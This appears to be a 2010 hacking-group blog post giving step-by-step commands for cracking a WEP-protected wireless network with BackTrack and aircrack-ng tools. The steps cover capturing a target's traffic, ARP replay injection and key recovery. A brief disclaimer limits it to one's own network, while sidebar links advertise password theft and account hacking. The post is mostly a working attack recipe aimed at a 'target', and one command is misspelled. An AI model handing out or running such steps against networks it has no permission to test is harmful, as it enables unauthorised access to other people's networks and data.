Welcome to the Gabol Hacker Crew: How to hack a WEP wireless Connection
Firesheep VS Blacksheep lets see who wins. See the post on firefox LINK See the post on Blacksheep LINK Learn how to hide files in pictures LINK Browse Anonymously anywhere – Bypass Firewall & Proxy LINK How to hack a WEP wireless Connection LINK How to be safe from Hackers..! LINK Are you safe.? LINK Top Websites Vulnerable to XXS attack LINK How to Track Your Stolen Laptop LINK Turn Your Firefox into a password Stealer Without any Software LINK How to Find a Serial Number for Any Program LINK How to hack a Email LINK These vulnerability sites cn get hacked by shells.. LINK How to HACK Facebook,hotmail,Yahoo,Gmail,Twitter,Orkut,Myspace and msn Passwords. LINK Mind belowing..!!! LINK

Thursday, November 25, 2010

How to hack a WEP wireless Connection

This tutorial is specially made for one of my best friend for only testing purpose. In this i will be demonstrating you guyz how insecure is WEP connection.. Before starting please check below the note.
-------------------------------------------------------------------------------------------------------
                                 ! NOTE !
This is only for testing the security of your own network. I shall not be responsible for misuse of it...Do not use it on others as it is illegal..
------------------------------------------------------------------------------



OK. now lets begin im going to make it simple by dividing it into steps..

  1. Goto www.backtrack-linux.org
  2. download back track ISO image
  3. Burn it to a CD via ISO image burner  (www.imgburn.com)
  4. Now restart your PC with the CD
  5. When it will pop up for login type startx
  6. open a new shell console
  7. type /etc/init.d/networking start
  8. now type airmon-ng
  9. airmon-ng stop [your wireless card name]
  10. airmon-ng start [wireless card name]
  11. airmon-ng
  12. airodump-ng [wireless card name]
  13. now note the target's channel number , bssid , essid
  14. now press ctrl c to stop
  15. airodump-ng -w wep -c [channel number] --bssid [bssid number] [wireless card name]
  16. now open a new console and type
  17. aireplay-ng -1 0 -a [bssid] [wireless card name]
  18. Now open  third console
  19. type
  20. airplay-ng -3 -b [bssid][wireless card name]
  21. now open the console where info was sending and receiving data
  22.    Run until data>30,000
  23. press ctrl c
  24. after this type DIR
  25. aircrack-ng [filename].cap
  26. WOW YOU GOT YOUR JOB DONE...